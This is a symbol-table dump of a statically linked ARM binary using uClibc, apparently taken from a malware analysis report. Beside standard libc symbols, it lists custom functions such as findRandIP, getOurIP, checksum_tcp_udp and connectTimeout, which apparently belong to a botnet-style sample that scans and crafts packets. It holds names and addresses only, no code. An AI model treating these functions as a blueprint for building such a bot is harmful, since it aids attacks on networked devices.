__floatsidf | .symtab | 0x1c398 | 40 | FUNC | <unknown> | HIDDEN | 2 | ||
__floatundidf | .symtab | 0x1c400 | 116 | FUNC | <unknown> | HIDDEN | 2 | ||
__floatunsidf | .symtab | 0x1c374 | 36 | FUNC | <unknown> | HIDDEN | 2 | ||
__frame_dummy_init_array_entry | .symtab | 0x29018 | 0 | OBJECT | <unknown> | DEFAULT | 8 | ||
__gedf2 | .symtab | 0x1c910 | 148 | FUNC | <unknown> | HIDDEN | 2 | ||
__get_hosts_byname_r | .symtab | 0x1b4a4 | 76 | FUNC | <unknown> | HIDDEN | 2 | ||
__getdents64 | .symtab | 0x19a98 | 324 | FUNC | <unknown> | HIDDEN | 2 | ||
__getpagesize | .symtab | 0x166a4 | 40 | FUNC | <unknown> | DEFAULT | 2 | ||
__glibc_strerror_r | .symtab | 0x13408 | 24 | FUNC | <unknown> | DEFAULT | 2 | ||
__glibc_strerror_r.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
__gtdf2 | .symtab | 0x1c910 | 148 | FUNC | <unknown> | HIDDEN | 2 | ||
__h_errno_location | .symtab | 0x16cc4 | 28 | FUNC | <unknown> | DEFAULT | 2 | ||
__h_errno_location.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
__init_array_end | .symtab | 0x2901c | 0 | NOTYPE | <unknown> | HIDDEN | 8 | ||
__init_array_start | .symtab | 0x29018 | 0 | NOTYPE | <unknown> | HIDDEN | 8 | ||
__ledf2 | .symtab | 0x1c918 | 140 | FUNC | <unknown> | HIDDEN | 2 | ||
__libc_close | .symtab | 0x11ae4 | 52 | FUNC | <unknown> | DEFAULT | 2 | ||
__libc_connect | .symtab | 0x136fc | 56 | FUNC | <unknown> | DEFAULT | 2 | ||
__libc_fcntl | .symtab | 0x11920 | 108 | FUNC | <unknown> | DEFAULT | 2 | ||
__libc_fork | .symtab | 0x11794 | 52 | FUNC | <unknown> | DEFAULT | 2 | ||
__libc_lseek64 | .symtab | 0x1b8ec | 100 | FUNC | <unknown> | DEFAULT | 2 | ||
__libc_nanosleep | .symtab | 0x16810 | 52 | FUNC | <unknown> | DEFAULT | 2 | ||
__libc_open | .symtab | 0x11668 | 96 | FUNC | <unknown> | DEFAULT | 2 | ||
__libc_read | .symtab | 0x11858 | 52 | FUNC | <unknown> | DEFAULT | 2 | ||
__libc_recv | .symtab | 0x137b0 | 56 | FUNC | <unknown> | DEFAULT | 2 | ||
__libc_recvfrom | .symtab | 0x137e8 | 60 | FUNC | <unknown> | DEFAULT | 2 | ||
__libc_select | .symtab | 0x11818 | 64 | FUNC | <unknown> | DEFAULT | 2 | ||
__libc_send | .symtab | 0x13824 | 56 | FUNC | <unknown> | DEFAULT | 2 | ||
__libc_sendto | .symtab | 0x1385c | 64 | FUNC | <unknown> | DEFAULT | 2 | ||
__libc_sigaction | .symtab | 0x1659c | 136 | FUNC | <unknown> | DEFAULT | 2 | ||
__libc_stack_end | .symtab | 0x2f5f4 | 4 | OBJECT | <unknown> | DEFAULT | 13 | ||
__libc_waitpid | .symtab | 0x117c8 | 28 | FUNC | <unknown> | DEFAULT | 2 | ||
__libc_write | .symtab | 0x119f8 | 52 | FUNC | <unknown> | DEFAULT | 2 | ||
__local_nameserver | .symtab | 0x20ccc | 16 | OBJECT | <unknown> | HIDDEN | 4 | ||
__ltdf2 | .symtab | 0x1c918 | 140 | FUNC | <unknown> | HIDDEN | 2 | ||
__malloc_consolidate | .symtab | 0x149e0 | 436 | FUNC | <unknown> | HIDDEN | 2 | ||
__malloc_largebin_index | .symtab | 0x13ab0 | 120 | FUNC | <unknown> | DEFAULT | 2 | ||
__malloc_lock | .symtab | 0x292ac | 24 | OBJECT | <unknown> | DEFAULT | 12 | ||
__malloc_state | .symtab | 0x2f790 | 888 | OBJECT | <unknown> | DEFAULT | 13 | ||
__malloc_trim | .symtab | 0x14930 | 176 | FUNC | <unknown> | DEFAULT | 2 | ||
__muldf3 | .symtab | 0x1c474 | 656 | FUNC | <unknown> | HIDDEN | 2 | ||
__nameserver | .symtab | 0x2fb18 | 4 | OBJECT | <unknown> | HIDDEN | 13 | ||
__nameservers | .symtab | 0x2fb1c | 4 | OBJECT | <unknown> | HIDDEN | 13 | ||
__nedf2 | .symtab | 0x1c920 | 132 | FUNC | <unknown> | HIDDEN | 2 | ||
__open_etc_hosts | .symtab | 0x1bb94 | 48 | FUNC | <unknown> | HIDDEN | 2 | ||
__open_nameservers | .symtab | 0x1afb0 | 1116 | FUNC | <unknown> | HIDDEN | 2 | ||
__pagesize | .symtab | 0x2f5fc | 4 | OBJECT | <unknown> | DEFAULT | 13 | ||
__preinit_array_end | .symtab | 0x29018 | 0 | NOTYPE | <unknown> | HIDDEN | SHN_ABS | ||
__preinit_array_start | .symtab | 0x29018 | 0 | NOTYPE | <unknown> | HIDDEN | SHN_ABS | ||
__progname | .symtab | 0x293a4 | 4 | OBJECT | <unknown> | DEFAULT | 12 | ||
__progname_full | .symtab | 0x293a8 | 4 | OBJECT | <unknown> | DEFAULT | 12 | ||
__pthread_initialize_minimal | .symtab | 0x0 | 0 | NOTYPE | <unknown> | DEFAULT | SHN_UNDEF | ||
__pthread_mutex_init | .symtab | 0x160c8 | 8 | FUNC | <unknown> | DEFAULT | 2 | ||
__pthread_mutex_lock | .symtab | 0x160c0 | 8 | FUNC | <unknown> | DEFAULT | 2 | ||
__pthread_mutex_trylock | .symtab | 0x160c0 | 8 | FUNC | <unknown> | DEFAULT | 2 | ||
__pthread_mutex_unlock | .symtab | 0x160c0 | 8 | FUNC | <unknown> | DEFAULT | 2 | ||
__pthread_return_0 | .symtab | 0x160c0 | 8 | FUNC | <unknown> | DEFAULT | 2 | ||
__read_etc_hosts_r | .symtab | 0x1bbc4 | 516 | FUNC | <unknown> | HIDDEN | 2 | ||
__register_frame_info | .symtab | 0x0 | 0 | NOTYPE | <unknown> | DEFAULT | SHN_UNDEF | ||
__res_sync | .symtab | 0x2fb10 | 4 | OBJECT | <unknown> | HIDDEN | 13 | ||
__resolv_attempts | .symtab | 0x293af | 1 | OBJECT | <unknown> | HIDDEN | 12 | ||
__resolv_lock | .symtab | 0x2f618 | 24 | OBJECT | <unknown> | DEFAULT | 13 | ||
__resolv_timeout | .symtab | 0x293ae | 1 | OBJECT | <unknown> | HIDDEN | 12 | ||
__rtld_fini | .symtab | 0x2f604 | 4 | OBJECT | <unknown> | HIDDEN | 13 | ||
__searchdomain | .symtab | 0x2fb14 | 4 | OBJECT | <unknown> | HIDDEN | 13 | ||
__searchdomains | .symtab | 0x2fb20 | 4 | OBJECT | <unknown> | HIDDEN | 13 | ||
__sigaddset | .symtab | 0x13a68 | 36 | FUNC | <unknown> | DEFAULT | 2 | ||
__sigdelset | .symtab | 0x13a8c | 36 | FUNC | <unknown> | DEFAULT | 2 | ||
__sigismember | .symtab | 0x13a44 | 36 | FUNC | <unknown> | DEFAULT | 2 | ||
__stdin | .symtab | 0x291ac | 4 | OBJECT | <unknown> | DEFAULT | 12 | ||
__stdio_READ | .symtab | 0x19d50 | 88 | FUNC | <unknown> | HIDDEN | 2 | ||
__stdio_WRITE | .symtab | 0x17380 | 180 | FUNC | <unknown> | HIDDEN | 2 | ||
__stdio_adjust_position | .symtab | 0x19da8 | 196 | FUNC | <unknown> | HIDDEN | 2 | ||
__stdio_fwrite | .symtab | 0x1773c | 320 | FUNC | <unknown> | HIDDEN | 2 | ||
__stdio_init_mutex | .symtab | 0x11ce8 | 52 | FUNC | <unknown> | HIDDEN | 2 | ||
__stdio_mutex_initializer.4636 | .symtab | 0x1ff44 | 24 | OBJECT | <unknown> | DEFAULT | 4 | ||
__stdio_rfill | .symtab | 0x19e6c | 48 | FUNC | <unknown> | HIDDEN | 2 | ||
__stdio_seek | .symtab | 0x19f34 | 60 | FUNC | <unknown> | HIDDEN | 2 | ||
__stdio_trans2r_o | .symtab | 0x19e9c | 152 | FUNC | <unknown> | HIDDEN | 2 | ||
__stdio_trans2w_o | .symtab | 0x1787c | 208 | FUNC | <unknown> | HIDDEN | 2 | ||
__stdio_wcommit | .symtab | 0x11df0 | 48 | FUNC | <unknown> | HIDDEN | 2 | ||
__stdout | .symtab | 0x291b0 | 4 | OBJECT | <unknown> | DEFAULT | 12 | ||
__subdf3 | .symtab | 0x1c060 | 788 | FUNC | <unknown> | HIDDEN | 2 | ||
__syscall_error | .symtab | 0x1657c | 32 | FUNC | <unknown> | HIDDEN | 2 | ||
__syscall_error.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
__syscall_fcntl.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
__syscall_rt_sigaction | .symtab | 0x16898 | 52 | FUNC | <unknown> | DEFAULT | 2 | ||
__syscall_rt_sigaction.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
__uClibc_fini | .symtab | 0x16104 | 124 | FUNC | <unknown> | DEFAULT | 2 | ||
__uClibc_init | .symtab | 0x161d4 | 108 | FUNC | <unknown> | DEFAULT | 2 | ||
__uClibc_main | .symtab | 0x16240 | 724 | FUNC | <unknown> | DEFAULT | 2 | ||
__uClibc_main.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
__uclibc_progname | .symtab | 0x293a0 | 4 | OBJECT | <unknown> | HIDDEN | 12 | ||
__udivsi3 | .symtab | 0x114b4 | 252 | FUNC | <unknown> | HIDDEN | 2 | ||
__vfork | .symtab | 0x115e0 | 64 | FUNC | <unknown> | HIDDEN | 2 | ||
__xpg_strerror_r | .symtab | 0x13450 | 256 | FUNC | <unknown> | DEFAULT | 2 | ||
__xpg_strerror_r.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
__xstat32_conv | .symtab | 0x19934 | 172 | FUNC | <unknown> | HIDDEN | 2 | ||
__xstat64_conv | .symtab | 0x19868 | 204 | FUNC | <unknown> | HIDDEN | 2 | ||
__xstat_conv | .symtab | 0x199e0 | 184 | FUNC | <unknown> | HIDDEN | 2 | ||
_adjust_pos.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
_bss_custom_printf_spec | .symtab | 0x2f410 | 10 | OBJECT | <unknown> | DEFAULT | 13 | ||
_bss_end__ | .symtab | 0x2fb24 | 0 | NOTYPE | <unknown> | DEFAULT | SHN_ABS | ||
_call_via_fp | .symtab | 0x80fd | 4 | FUNC | <unknown> | HIDDEN | 2 | ||
_call_via_ip | .symtab | 0x8101 | 4 | FUNC | <unknown> | HIDDEN | 2 | ||
_call_via_lr | .symtab | 0x8109 | 4 | FUNC | <unknown> | HIDDEN | 2 | ||
_call_via_r0 | .symtab | 0x80d1 | 4 | FUNC | <unknown> | HIDDEN | 2 | ||
_call_via_r1 | .symtab | 0x80d5 | 4 | FUNC | <unknown> | HIDDEN | 2 | ||
_call_via_r2 | .symtab | 0x80d9 | 4 | FUNC | <unknown> | HIDDEN | 2 | ||
_call_via_r3 | .symtab | 0x80dd | 4 | FUNC | <unknown> | HIDDEN | 2 | ||
_call_via_r4 | .symtab | 0x80e1 | 4 | FUNC | <unknown> | HIDDEN | 2 | ||
_call_via_r5 | .symtab | 0x80e5 | 4 | FUNC | <unknown> | HIDDEN | 2 | ||
_call_via_r6 | .symtab | 0x80e9 | 4 | FUNC | <unknown> | HIDDEN | 2 | ||
_call_via_r7 | .symtab | 0x80ed | 4 | FUNC | <unknown> | HIDDEN | 2 | ||
_call_via_r8 | .symtab | 0x80f1 | 4 | FUNC | <unknown> | HIDDEN | 2 | ||
_call_via_r9 | .symtab | 0x80f5 | 4 | FUNC | <unknown> | HIDDEN | 2 | ||
_call_via_sl | .symtab | 0x80f9 | 4 | FUNC | <unknown> | HIDDEN | 2 | ||
_call_via_sp | .symtab | 0x8105 | 4 | FUNC | <unknown> | HIDDEN | 2 | ||
_charpad | .symtab | 0x11e20 | 84 | FUNC | <unknown> | DEFAULT | 2 | ||
_cs_funcs.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
_custom_printf_arginfo | .symtab | 0x2f738 | 40 | OBJECT | <unknown> | HIDDEN | 13 | ||
_custom_printf_handler | .symtab | 0x2f760 | 40 | OBJECT | <unknown> | HIDDEN | 13 | ||
_custom_printf_spec | .symtab | 0x292a8 | 4 | OBJECT | <unknown> | HIDDEN | 12 | ||
_dl_aux_init | .symtab | 0x19780 | 56 | FUNC | <unknown> | DEFAULT | 2 | ||
_dl_phdr | .symtab | 0x2fb08 | 4 | OBJECT | <unknown> | DEFAULT | 13 | ||
_dl_phnum | .symtab | 0x2fb0c | 4 | OBJECT | <unknown> | DEFAULT | 13 | ||
_edata | .symtab | 0x293b8 | 0 | NOTYPE | <unknown> | DEFAULT | SHN_ABS | ||
_end | .symtab | 0x2fb24 | 0 | NOTYPE | <unknown> | DEFAULT | SHN_ABS | ||
_errno | .symtab | 0x2f608 | 4 | OBJECT | <unknown> | DEFAULT | 13 | ||
_exit | .symtab | 0x11a80 | 44 | FUNC | <unknown> | DEFAULT | 2 | ||
_exit.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
_fini | .symtab | 0x1caa4 | 0 | FUNC | <unknown> | DEFAULT | 3 | ||
_fixed_buffers | .symtab | 0x2d410 | 8192 | OBJECT | <unknown> | DEFAULT | 13 | ||
_fopen.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
_fp_out_narrow | .symtab | 0x11e74 | 132 | FUNC | <unknown> | DEFAULT | 2 | ||
_fpmaxtostr | .symtab | 0x17b44 | 2036 | FUNC | <unknown> | HIDDEN | 2 | ||
_fpmaxtostr.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
_fwrite.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
_h_errno | .symtab | 0x2f60c | 4 | OBJECT | <unknown> | DEFAULT | 13 | ||
_init | .symtab | 0x80b4 | 0 | FUNC | <unknown> | DEFAULT | 1 | ||
_load_inttype | .symtab | 0x1794c | 112 | FUNC | <unknown> | HIDDEN | 2 | ||
_load_inttype.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
_memcpy | .symtab | 0x18a30 | 0 | FUNC | <unknown> | HIDDEN | 2 | ||
_ppfs_init | .symtab | 0x125e0 | 160 | FUNC | <unknown> | HIDDEN | 2 | ||
_ppfs_init.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
_ppfs_parsespec | .symtab | 0x128c8 | 1392 | FUNC | <unknown> | HIDDEN | 2 | ||
_ppfs_parsespec.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
_ppfs_prepargs | .symtab | 0x12680 | 68 | FUNC | <unknown> | HIDDEN | 2 | ||
_ppfs_prepargs.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
_ppfs_setargs | .symtab | 0x126c4 | 432 | FUNC | <unknown> | HIDDEN | 2 | ||
_ppfs_setargs.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
_promoted_size | .symtab | 0x12874 | 84 | FUNC | <unknown> | DEFAULT | 2 | ||
_pthread_cleanup_pop_restore | .symtab | 0x160d8 | 44 | FUNC | <unknown> | DEFAULT | 2 | ||
_pthread_cleanup_push_defer | .symtab | 0x160d0 | 8 | FUNC | <unknown> | DEFAULT | 2 | ||
_rfill.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
_sigintr | .symtab | 0x2f788 | 8 | OBJECT | <unknown> | HIDDEN | 13 | ||
_start | .symtab | 0x81b0 | 0 | FUNC | <unknown> | DEFAULT | 2 | ||
_stdio.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
_stdio_fopen | .symtab | 0x17434 | 776 | FUNC | <unknown> | HIDDEN | 2 | ||
_stdio_init | .symtab | 0x11c80 | 104 | FUNC | <unknown> | HIDDEN | 2 | ||
_stdio_openlist | .symtab | 0x291b4 | 4 | OBJECT | <unknown> | DEFAULT | 12 | ||
_stdio_openlist_add_lock | .symtab | 0x2916c | 24 | OBJECT | <unknown> | DEFAULT | 12 | ||
_stdio_openlist_dec_use | .symtab | 0x184d0 | 392 | FUNC | <unknown> | HIDDEN | 2 | ||
_stdio_openlist_del_count | .symtab | 0x2d40c | 4 | OBJECT | <unknown> | DEFAULT | 13 | ||
_stdio_openlist_del_lock | .symtab | 0x29184 | 24 | OBJECT | <unknown> | DEFAULT | 12 | ||
_stdio_openlist_use_count | .symtab | 0x2d408 | 4 | OBJECT | <unknown> | DEFAULT | 13 | ||
_stdio_streams | .symtab | 0x291b8 | 240 | OBJECT | <unknown> | DEFAULT | 12 | ||
_stdio_term | .symtab | 0x11d1c | 212 | FUNC | <unknown> | HIDDEN | 2 | ||
_stdio_user_locking | .symtab | 0x2919c | 4 | OBJECT | <unknown> | DEFAULT | 12 | ||
_stdlib_strto_l | .symtab | 0x1557c | 448 | FUNC | <unknown> | HIDDEN | 2 | ||
_stdlib_strto_l.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
_store_inttype | .symtab | 0x179bc | 44 | FUNC | <unknown> | HIDDEN | 2 | ||
_store_inttype.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
_string_syserrmsgs | .symtab | 0x20014 | 2906 | OBJECT | <unknown> | HIDDEN | 4 | ||
_string_syserrmsgs.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
_trans2r.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
_trans2w.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
_uintmaxtostr | .symtab | 0x179e8 | 348 | FUNC | <unknown> | HIDDEN | 2 | ||
_uintmaxtostr.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
_vfprintf_internal | .symtab | 0x11ef8 | 1768 | FUNC | <unknown> | HIDDEN | 2 | ||
_vfprintf_internal.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
_wcommit.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
abort | .symtab | 0x14e10 | 296 | FUNC | <unknown> | DEFAULT | 2 | ||
abort.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
access | .symtab | 0x117e4 | 52 | FUNC | <unknown> | DEFAULT | 2 | ||
access.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
acnc | .symtab | 0xc3bc | 208 | FUNC | <unknown> | DEFAULT | 2 | ||
add_entry | .symtab | 0x1048c | 140 | FUNC | <unknown> | DEFAULT | 2 | ||
aeabi_unwind_cpp_pr1.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
atoi | .symtab | 0x15540 | 32 | FUNC | <unknown> | DEFAULT | 2 | ||
atol | .symtab | 0x15540 | 32 | FUNC | <unknown> | DEFAULT | 2 | ||
atol.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
bcopy | .symtab | 0x13020 | 16 | FUNC | <unknown> | DEFAULT | 2 | ||
been_there_done_that | .symtab | 0x2f5ec | 4 | OBJECT | <unknown> | DEFAULT | 13 | ||
brk | .symtab | 0x197b8 | 76 | FUNC | <unknown> | DEFAULT | 2 | ||
brk.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
bsd_signal | .symtab | 0x1398c | 184 | FUNC | <unknown> | DEFAULT | 2 | ||
buf.5444 | .symtab | 0x2f420 | 440 | OBJECT | <unknown> | DEFAULT | 13 | ||
bzero | .symtab | 0x13060 | 12 | FUNC | <unknown> | DEFAULT | 2 | ||
c | .symtab | 0x29150 | 4 | OBJECT | <unknown> | DEFAULT | 12 | ||
calloc | .symtab | 0x14448 | 308 | FUNC | <unknown> | DEFAULT | 2 | ||
calloc.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
checksum.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
checksum_generic | .symtab | 0x81ec | 216 | FUNC | <unknown> | DEFAULT | 2 | ||
checksum_tcp_udp | .symtab | 0x82c4 | 424 | FUNC | <unknown> | DEFAULT | 2 | ||
checksum_tcpudp | .symtab | 0x846c | 424 | FUNC | <unknown> | DEFAULT | 2 | ||
clock | .symtab | 0x11b64 | 52 | FUNC | <unknown> | DEFAULT | 2 | ||
clock.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
clock_getres | .symtab | 0x166e0 | 52 | FUNC | <unknown> | DEFAULT | 2 | ||
clock_getres.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
close | .symtab | 0x11ae4 | 52 | FUNC | <unknown> | DEFAULT | 2 | ||
close.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
closedir | .symtab | 0x168cc | 248 | FUNC | <unknown> | DEFAULT | 2 | ||
closedir.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
closenameservers.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
completed.4959 | .symtab | 0x293b8 | 1 | OBJECT | <unknown> | DEFAULT | 13 | ||
connect | .symtab | 0x136fc | 56 | FUNC | <unknown> | DEFAULT | 2 | ||
connect.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
connectTimeout | .symtab | 0xa08c | 628 | FUNC | <unknown> | DEFAULT | 2 | ||
crtstuff.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
crtstuff.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
csum | .symtab | 0xa50c | 340 | FUNC | <unknown> | DEFAULT | 2 | ||
data_start | .symtab | 0x290a0 | 0 | NOTYPE | <unknown> | DEFAULT | 12 | ||
decoded.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
decodeh.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
dl-support.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
dnslookup.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
dup2 | .symtab | 0x11620 | 52 | FUNC | <unknown> | DEFAULT | 2 | ||
dup2.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
encoded.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
encodeh.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
encodeq.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
environ | .symtab | 0x2f5f8 | 4 | OBJECT | <unknown> | DEFAULT | 13 | ||
errno | .symtab | 0x2f608 | 4 | OBJECT | <unknown> | DEFAULT | 13 | ||
errno.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
execl | .symtab | 0x15fc4 | 172 | FUNC | <unknown> | DEFAULT | 2 | ||
execl.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
execve | .symtab | 0x16670 | 52 | FUNC | <unknown> | DEFAULT | 2 | ||
execve.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
exit | .symtab | 0x1573c | 184 | FUNC | <unknown> | DEFAULT | 2 | ||
exit.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
exp10_table | .symtab | 0x20c20 | 72 | OBJECT | <unknown> | DEFAULT | 4 | ||
fclose | .symtab | 0x171ac | 436 | FUNC | <unknown> | DEFAULT | 2 | ||
fclose.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
fcntl | .symtab | 0x11920 | 108 | FUNC | <unknown> | DEFAULT | 2 | ||
fd_to_DIR | .symtab | 0x169c4 | 208 | FUNC | <unknown> | DEFAULT | 2 | ||
fdgets | .symtab | 0x9930 | 212 | FUNC | <unknown> | DEFAULT | 2 | ||
fdopen_pids | .symtab | 0x2d3f4 | 4 | OBJECT | <unknown> | DEFAULT | 13 | ||
fdopendir | .symtab | 0x16b40 | 152 | FUNC | <unknown> | DEFAULT | 2 | ||
fdpclose | .symtab | 0x97a8 | 392 | FUNC | <unknown> | DEFAULT | 2 | ||
fdpopen | .symtab | 0x9520 | 648 | FUNC | <unknown> | DEFAULT | 2 | ||
fflush_unlocked | .symtab | 0x18658 | 524 | FUNC | <unknown> | DEFAULT | 2 | ||
fflush_unlocked.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
fgetc | .symtab | 0x18338 | 220 | FUNC | <unknown> | DEFAULT | 2 | ||
fgetc.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
fgetc_unlocked | .symtab | 0x18864 | 300 | FUNC | <unknown> | DEFAULT | 2 | ||
fgetc_unlocked.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
fgets | .symtab | 0x18414 | 188 | FUNC | <unknown> | DEFAULT | 2 | ||
fgets.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
fgets_unlocked | .symtab | 0x18990 | 160 | FUNC | <unknown> | DEFAULT | 2 | ||
fgets_unlocked.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
findRandIP | .symtab | 0xa4a8 | 100 | FUNC | <unknown> | DEFAULT | 2 | ||
fmt | .symtab | 0x20c08 | 20 | OBJECT | <unknown> | DEFAULT | 4 | ||
fopen | .symtab | 0x17360 | 32 | FUNC | <unknown> | DEFAULT | 2 | ||
fopen.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
fork | .symtab | 0x11794 | 52 | FUNC | <unknown> | DEFAULT | 2 | ||
fork.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
fputs_unlocked | .symtab | 0x12e38 | 56 | FUNC | <unknown> | DEFAULT | 2 | ||
fputs_unlocked.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
frame_dummy | .symtab | 0x8150 | 0 | FUNC | <unknown> | DEFAULT | 2 | ||
free | .symtab | 0x14b94 | 572 | FUNC | <unknown> | DEFAULT | 2 | ||
free.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
fseek | .symtab | 0x19bdc | 36 | FUNC | <unknown> | DEFAULT | 2 | ||
fseeko | .symtab | 0x19bdc | 36 | FUNC | <unknown> | DEFAULT | 2 | ||
fseeko.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
fseeko64 | .symtab | 0x19c00 | 336 | FUNC | <unknown> | DEFAULT | 2 | ||
fseeko64.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
fstat | .symtab | 0x19810 | 88 | FUNC | <unknown> | DEFAULT | 2 | ||
fstat.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
fwrite_unlocked | .symtab | 0x12e70 | 176 | FUNC | <unknown> | DEFAULT | 2 | ||
fwrite_unlocked.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
getBuild | .symtab | 0xea50 | 24 | FUNC | <unknown> | DEFAULT | 2 | ||
getHost | .symtab | 0x9c34 | 104 | FUNC | <unknown> | DEFAULT | 2 | ||
getOurIP | .symtab | 0xe794 | 700 | FUNC | <unknown> | DEFAULT | 2 | ||
get_hosts_byname_r.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
getc | .symtab | 0x18338 | 220 | FUNC | <unknown> | DEFAULT | 2 | ||
getc_unlocked | .symtab | 0x18864 | 300 | FUNC | <unknown> | DEFAULT | 2 | ||
getdents64.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
getdtablesize | .symtab | 0x1188c | 44 | FUNC | <unknown> | DEFAULT | 2 | ||
getdtablesize.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
getegid | .symtab | 0x16748 | 20 | FUNC | <unknown> | DEFAULT | 2 | ||
getegid.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
geteuid | .symtab | 0x11780 | 20 | FUNC | <unknown> | DEFAULT | 2 | ||
geteuid.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
getgid | .symtab | 0x167c8 | 20 | FUNC | <unknown> | DEFAULT | 2 | ||
getgid.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
gethostbyname | .symtab | 0x13678 | 28 | FUNC | <unknown> | DEFAULT | 2 | ||
gethostbyname.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
